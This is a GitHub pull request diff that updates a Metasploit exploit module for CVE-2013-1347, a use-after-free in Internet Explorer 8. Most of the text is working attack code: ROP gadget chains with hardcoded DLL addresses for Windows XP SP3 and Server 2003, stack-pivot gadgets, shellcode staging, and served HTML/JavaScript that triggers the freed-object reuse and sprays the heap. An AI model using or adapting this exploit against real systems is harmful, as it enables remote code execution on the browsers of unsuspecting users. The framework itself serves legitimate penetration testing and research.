Skip to content
New issue

Have a question about this project? Sign up for a free GitHub account to open an issue and contact its maintainers and the community.

Sign up for GitHub

By clicking “Sign up for GitHub”, you agree to our terms of service and privacy statement. We’ll occasionally send you account related emails.

Already on GitHub? Sign in to your account

Jump to bottom

Update for CVE-2013-1347 #1809

Merged
merged 3 commits into from
May 8, 2013
Merged

Update for CVE-2013-1347 #1809

Changes from all commits
Commits
Show all changes
3 commits
Select commit Hold shift + click to select a range
c7609ac
Initial update
wchen-r7 May 8, 2013
075f6e8
Updates ROP chain and mstime_malloc usage
wchen-r7 May 8, 2013
9a1400a
Forgot to remove this print_warning
wchen-r7 May 8, 2013
File filter

Filter by extension

Filter by extension
Conversations
Failed to load comments.
Jump to
Jump to file
Failed to load files.
Diff view
Diff view
178 changes: 59 additions & 119 deletions modules/exploits/windows/browser/ie_cgenericelement_uaf.rb
View file
Open in desktop
Original file line number Diff line number Diff line change
@@ -1,5 +1,4 @@
##
#
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# Framework web site for more information on licensing and terms of use.
Expand Down Expand Up @@ -48,6 +47,7 @@ def initialize(info={})
[
[ 'CVE', '2013-1347' ],
[ 'OSVDB', '92993' ],
[ 'US-CERT-VU', '237655' ],
[ 'URL', 'http://blogs.technet.com/b/msrc/archive/2013/05/03/microsoft-releases-security-advisory-2847140.aspx'],
[ 'URL', 'http://r-7.co/IE8-DOL' ] # sinn3r's writeup
],
Expand Down Expand Up @@ -82,7 +82,6 @@ def initialize(info={})
end

def get_target(agent)
#If the user is already specified by the user, we'll just use that
return target if target.name != 'Automatic'

nt = agent.scan(/Windows NT (\d\.\d)/).flatten[0] || ''
Expand Down Expand Up @@ -114,80 +113,16 @@ def get_target(agent)
return nil
end

def ie8_smil(my_target, p)

case my_target['Rop']
when :msvcrt
case my_target.name
when 'IE 8 on Windows XP SP3'
align_esp = Rex::Text.to_unescape([0x77c4d801].pack("V*")) # ADD ESP, 2C; RET
xchg_esp = Rex::Text.to_unescape([0x77c15ed5].pack("V*")) # XCHG EAX, ESP, RET
when 'IE 8 on Windows Server 2003'
align_esp = Rex::Text.to_unescape([0x77bde7f6].pack("V*"))
xchg_esp = Rex::Text.to_unescape([0x77bcba5e].pack("V*"))
end
else
align_esp = Rex::Text.to_unescape([0x7C3445F8].pack("V*"))
xchg_esp = Rex::Text.to_unescape([0x7C348B05].pack("V*"))
end

padding = Rex::Text.to_unescape(Rex::Text.rand_text_alpha(4))
js_payload = Rex::Text.to_unescape(p)

js = %Q|
unicorn = unescape("ABCD");
unicorn2 = unescape("EEEE");
for (i=0; i < 2; i++) {
unicorn += unescape("ABCD");
}unicorn += unescape("AB");

unicorn += unescape("#{js_payload}");

animvalues = unescape("#{align_esp}");

for (i=0; i < 0x70/4; i++) {
if (i == 0x70/4-1) {
animvalues += unescape("#{xchg_esp}");
}
else {
animvalues += unescape("#{align_esp}");
}
}

animvalues += unicorn;

for(i = 0; i < 13; i++) {
animvalues += ";red";
}
|

if datastore['OBFUSCATE']
js = ::Rex::Exploitation::JSObfu.new(js)
js.obfuscate
end

return js
end

def junk(n=4)
return rand_text_alpha(n).unpack("V")[0].to_i
end

def nop
return make_nops(4).unpack("V")[0].to_i
end

def get_payload(t, cli)
code = payload.encoded

# No rop. Just return the payload.
return code if t['Rop'].nil?
rop_payload = ''

case t['Rop']
when :msvcrt
case t.name
when 'IE 8 on Windows XP SP3'
rop_gadgets =
algin = "\x81\xc4\x54\xf2\xff\xff" # Stack adjustment # add esp, -3500
chain = ''

if t.name == 'IE 8 on Windows XP SP3'
chain =
[
0x77c1e844, # POP EBP # RETN [msvcrt.dll]
0x77c1e844, # skip 4 bytes [msvcrt.dll]
Expand All @@ -212,8 +147,12 @@ def get_payload(t, cli)
0x77c12df9, # PUSHAD # RETN [msvcrt.dll]
0x77c35459 # ptr to 'push esp # ret ' [msvcrt.dll]
].pack("V*")
when 'IE 8 on Windows Server 2003'
rop_gadgets =

elsif t.name == 'IE 8 on Windows Server 2003'
junk = rand_text_alpha(4).unpack("V")[0].to_i
nop = make_nops(4).unpack("V")[0].to_i

chain =
[
0x77bb2563, # POP EAX # RETN
0x77ba1114, # <- *&VirtualProtect()
Expand Down Expand Up @@ -241,48 +180,39 @@ def get_payload(t, cli)
0x77be6591 # PUSHAD # ADD AL,0EF # RETN
].pack("V*")
end
else
rop_gadgets =
[
0x7c37653d, # POP EAX # POP EDI # POP ESI # POP EBX # POP EBP # RETN
0xfffffdff, # Value to negate, will become 0x00000201 (dwSize)
0x7c347f98, # RETN (ROP NOP) [msvcr71.dll]
0x7c3415a2, # JMP [EAX] [msvcr71.dll]
0xffffffff,
0x7c376402, # skip 4 bytes [msvcr71.dll]
0x7c351e05, # NEG EAX # RETN [msvcr71.dll]
0x7c345255, # INC EBX # FPATAN # RETN [msvcr71.dll]
0x7c352174, # ADD EBX,EAX # XOR EAX,EAX # INC EAX # RETN [msvcr71.dll]
0x7c344f87, # POP EDX # RETN [msvcr71.dll]
0xffffffc0, # Value to negate, will become 0x00000040
0x7c351eb1, # NEG EDX # RETN [msvcr71.dll]
0x7c34d201, # POP ECX # RETN [msvcr71.dll]
0x7c38b001, # &Writable location [msvcr71.dll]
0x7c347f97, # POP EAX # RETN [msvcr71.dll]
0x7c37a151, # ptr to &VirtualProtect() - 0x0EF [IAT msvcr71.dll]
0x7c378c81, # PUSHAD # ADD AL,0EF # RETN [msvcr71.dll]
0x7c345c30 # ptr to 'push esp # ret ' [msvcr71.dll]
# rop chain generated with mona.py
].pack("V*")
end

rop_payload = rop_gadgets
case t['Rop']
when :msvcrt
rop_payload << "\x81\xc4\x54\xf2\xff\xff" # Stack adjustment # add esp, -3500
rop_payload = chain + algin + payload.encoded

else
rop_payload << "\x81\xEC\xF0\xD8\xFF\xFF" # sub esp, -10000
code = "\x81\xEC\xF0\xD8\xFF\xFF" # sub esp, -10000
code << payload.encoded
code << rand_text_alpha(12000)

rop_payload = generate_rop_payload('java', code)
end
rop_payload << code
rop_payload << rand_text_alpha(12000) unless t['Rop'] == :msvcrt

return rop_payload
end

def load_exploit_html(my_target, cli)
case my_target['Rop']
when :msvcrt
case my_target.name
when 'IE 8 on Windows XP SP3'
align_esp = Rex::Text.to_unescape([0x77c4d801].pack("V*")) # ADD ESP, 2C; RET
xchg_esp = Rex::Text.to_unescape([0x77c15ed5].pack("V*")) # XCHG EAX, ESP, RET
when 'IE 8 on Windows Server 2003'
align_esp = Rex::Text.to_unescape([0x77bde7f6].pack("V*"))
xchg_esp = Rex::Text.to_unescape([0x77bcba5e].pack("V*"))
end
else
align_esp = Rex::Text.to_unescape([0x7C3445F8].pack("V*"))
xchg_esp = Rex::Text.to_unescape([0x7C348B05].pack("V*"))
end

padding = Rex::Text.to_unescape(Rex::Text.rand_text_alpha(4))
js_payload = Rex::Text.to_unescape(get_payload(my_target, cli))

p = get_payload(my_target, cli)
js = ie8_smil(my_target, p)

html = %Q|
<!doctype html>
Expand All @@ -293,9 +223,10 @@ def load_exploit_html(my_target, cli)
</meta>

<script>
#{js_mstime_malloc}

function helloWorld()
{
#{js}
f0 = document.createElement('span');
document.body.appendChild(f0);
f1 = document.createElement('span');
Expand All @@ -306,21 +237,32 @@ def load_exploit_html(my_target, cli)
f2.appendChild(document.createElement('datalist'));
f1.appendChild(document.createElement('span'));
f1.appendChild(document.createElement('table'));
try{
f0.offsetParent=null;
}catch(e) {

}f2.innerHTML="";
try { f0.offsetParent=null;}
catch(e) { }

f2.innerHTML = "";
f0.appendChild(document.createElement('hr'));
f1.innerHTML="";
f1.innerHTML = "";

CollectGarbage();

try {
a = document.getElementById('myanim');
a.values = animvalues;
sparkle = unescape("ABCD");
for (i=0; i < 2; i++) {
sparkle += unescape("ABCD");
}
catch(e) {}
sparkle += unescape("AB");
sparkle += unescape("#{js_payload}");

magenta = unescape("#{align_esp}");

for (i=0; i < 0x70/4; i++) {
if (i == 0x70/4-1) { magenta += unescape("#{xchg_esp}"); }
else { magenta += unescape("#{align_esp}"); }
}

magenta += sparkle;
mstime_malloc({shellcode:magenta, heapBlockSize:0x38, objId:"myanim"});
}

</script>
Expand All @@ -341,7 +283,6 @@ def on_request_uri(cli, request)
print_status("Requesting: #{uri}")

my_target = get_target(agent)
# Avoid the attack if no suitable target found
if my_target.nil?
print_error("Browser not supported, sending 404: #{agent}")
send_not_found(cli)
Expand All @@ -355,4 +296,3 @@ def on_request_uri(cli, request)
end

end